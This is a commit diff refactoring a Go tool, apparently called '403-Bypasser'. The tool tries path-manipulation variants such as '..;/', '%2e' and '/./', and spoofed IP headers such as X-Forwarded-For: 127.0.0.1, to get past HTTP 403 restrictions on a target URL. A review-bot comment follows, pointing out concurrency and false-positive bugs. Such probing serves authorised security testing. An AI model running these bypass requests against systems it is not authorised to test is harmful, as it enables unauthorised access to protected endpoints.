commit
9c1edf9fc7
|
@ -0,0 +1,2 @@
|
|||
fmt:
|
||||
@gofmt -w -s main.go && goimports -w main.go && go vet main.go
|
196
main.go
196
main.go
|
@ -1,46 +1,21 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"flag"
|
||||
"fmt"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"regexp"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
var Red = "\033[31m"
|
||||
var Green = "\033[32m"
|
||||
var White = "\033[97m"
|
||||
|
||||
func main() {
|
||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||
flag.Parse()
|
||||
|
||||
if *domain == "" || *path == "" {
|
||||
log.Fatalln("Using flag -url and -path")
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
upperCase := strings.ToUpper(*path)
|
||||
|
||||
endpoint := []string{
|
||||
*domain + "/" + upperCase,
|
||||
*domain + "/" + *path + "/",
|
||||
*domain + "/" + *path + "/.",
|
||||
*domain + "//" + *path + "//",
|
||||
*domain + "/./" + *path + "/./",
|
||||
*domain + "/./" + *path + "/..",
|
||||
*domain + "/;/" + *path,
|
||||
*domain + "/.;/" + *path,
|
||||
*domain + "//;//" + *path,
|
||||
*domain + "/" + *path + "..;/",
|
||||
*domain + "/%2e/" + *path,
|
||||
*domain + "/%252e/" + *path,
|
||||
*domain + "/%ef%bc%8f" + *path}
|
||||
|
||||
headers := []string{
|
||||
var (
|
||||
reURL = regexp.MustCompile("^https?://")
|
||||
headerPayloads = []string{
|
||||
"X-Custom-IP-Authorization",
|
||||
"X-Originating-IP",
|
||||
"X-Forwarded-For",
|
||||
|
@ -49,52 +24,127 @@ func main() {
|
|||
"X-Host",
|
||||
"X-Forwarded-Host",
|
||||
"X-ProxyUser-Ip",
|
||||
"X-Remote-Addr"}
|
||||
"X-Remote-Addr",
|
||||
}
|
||||
)
|
||||
|
||||
fmt.Println(Green, " _ _ ___ ____ ____ ")
|
||||
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
|
||||
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
|
||||
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
|
||||
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
|
||||
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
|
||||
fmt.Println(Green, " __/ | | ")
|
||||
fmt.Println(Green, " |___/|_| v1.0.2", White)
|
||||
const (
|
||||
version string = "v1.1.0"
|
||||
red string = "\033[31m"
|
||||
green string = "\033[32m"
|
||||
white string = "\033[97m"
|
||||
|
||||
fmt.Println("\nDomain:", *domain)
|
||||
fmt.Println("Path:", *path)
|
||||
headerValue string = "127.0.0.1"
|
||||
)
|
||||
|
||||
fmt.Println("\nNormal Request")
|
||||
for i, str := range endpoint {
|
||||
req, err := http.Get(str)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
|
||||
if req.StatusCode == 200 {
|
||||
fmt.Println(Green, i+1, output, White)
|
||||
} else {
|
||||
fmt.Println(Red, i+1, output, White)
|
||||
}
|
||||
func showBanner() {
|
||||
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
|
||||
" _ _ ___ ____ ____\n",
|
||||
"| || | / _ \\___ \\ | _ \\\n",
|
||||
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
|
||||
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
|
||||
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
|
||||
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
|
||||
" __/ | |\n",
|
||||
" |___/|_| ",
|
||||
version, white)
|
||||
}
|
||||
|
||||
func getValidDomain(domain string) string {
|
||||
trimmedDomain := strings.TrimSpace(domain)
|
||||
|
||||
if !reURL.MatchString(trimmedDomain) {
|
||||
trimmedDomain = "https://" + trimmedDomain
|
||||
}
|
||||
|
||||
fmt.Println("\nRequest with Headers")
|
||||
for j, head := range headers {
|
||||
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
req2.Header.Set(head, "127.0.0.1")
|
||||
resp, err := http.DefaultClient.Do(req2)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
|
||||
return trimmedDomain
|
||||
}
|
||||
|
||||
if resp.StatusCode == 200 {
|
||||
fmt.Println(Green, j+1, output2, White)
|
||||
} else {
|
||||
fmt.Println(Red, j+1, output2, White)
|
||||
}
|
||||
func constructEndpointPayloads(domain, path string) []string {
|
||||
return []string{
|
||||
domain + "/" + strings.ToUpper(path),
|
||||
domain + "/" + path + "/",
|
||||
domain + "/" + path + "/.",
|
||||
domain + "//" + path + "//",
|
||||
domain + "/./" + path + "/./",
|
||||
domain + "/./" + path + "/..",
|
||||
domain + "/;/" + path,
|
||||
domain + "/.;/" + path,
|
||||
domain + "//;//" + path,
|
||||
domain + "/" + path + "..;/",
|
||||
domain + "/%2e/" + path,
|
||||
domain + "/%252e/" + path,
|
||||
domain + "/%ef%bc%8f" + path,
|
||||
}
|
||||
}
|
||||
|
||||
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||
defer cancel()
|
||||
defer wg.Done()
|
||||
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
|
||||
var h string
|
||||
if header != nil {
|
||||
h = header[0]
|
||||
req.Header.Set(h, headerValue)
|
||||
}
|
||||
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
color := green
|
||||
if resp.StatusCode != 200 {
|
||||
color = red
|
||||
}
|
||||
|
||||
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
|
||||
}
|
||||
|
||||
func main() {
|
||||
runtime.GOMAXPROCS(1)
|
||||
|
||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||
flag.Parse()
|
||||
|
||||
if *domain == "" || *path == "" {
|
||||
log.Fatalln("Using flag -url and -path")
|
||||
}
|
||||
|
||||
validDomain := getValidDomain(*domain)
|
||||
validPath := strings.TrimSpace(*path)
|
||||
endpoints := constructEndpointPayloads(validDomain, validPath)
|
||||
|
||||
showBanner()
|
||||
|
||||
fmt.Println("\nDomain:", validDomain)
|
||||
fmt.Println("Path:", validPath)
|
||||
|
||||
fmt.Println("\nNormal Request")
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(len(endpoints))
|
||||
|
||||
for _, e := range endpoints {
|
||||
go penetrateEndpoint(&wg, e)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
|
||||
fmt.Println("\nRequest with Headers")
|
||||
wg.Add(len(headerPayloads))
|
||||
|
||||
for _, h := range headerPayloads {
|
||||
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
}
|
||||
|
|
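Review bot: In the new `penetrateEndpoint`, both error paths call `log.Fatal(err)` from inside a goroutine, so one timeout or DNS failure on a single probe exits the whole process and discards the results of every other in-flight request; the deferred `wg.Done()` and `cancel()` never run because log.Fatal ends in os.Exit. Log the failure and return instead, e.g. `log.Println(red, url, err, white); return`, so the remaining checks still report. The guard `if header != nil` should be `if len(header) > 0`, since an empty but non-nil variadic slice would panic on `header[0]`. Because `http.DefaultClient` follows redirects, a 302 to a login page that answers 200 is printed green, so anyone using this output to verify an access-control fix should treat green lines as candidates to confirm rather than confirmed results.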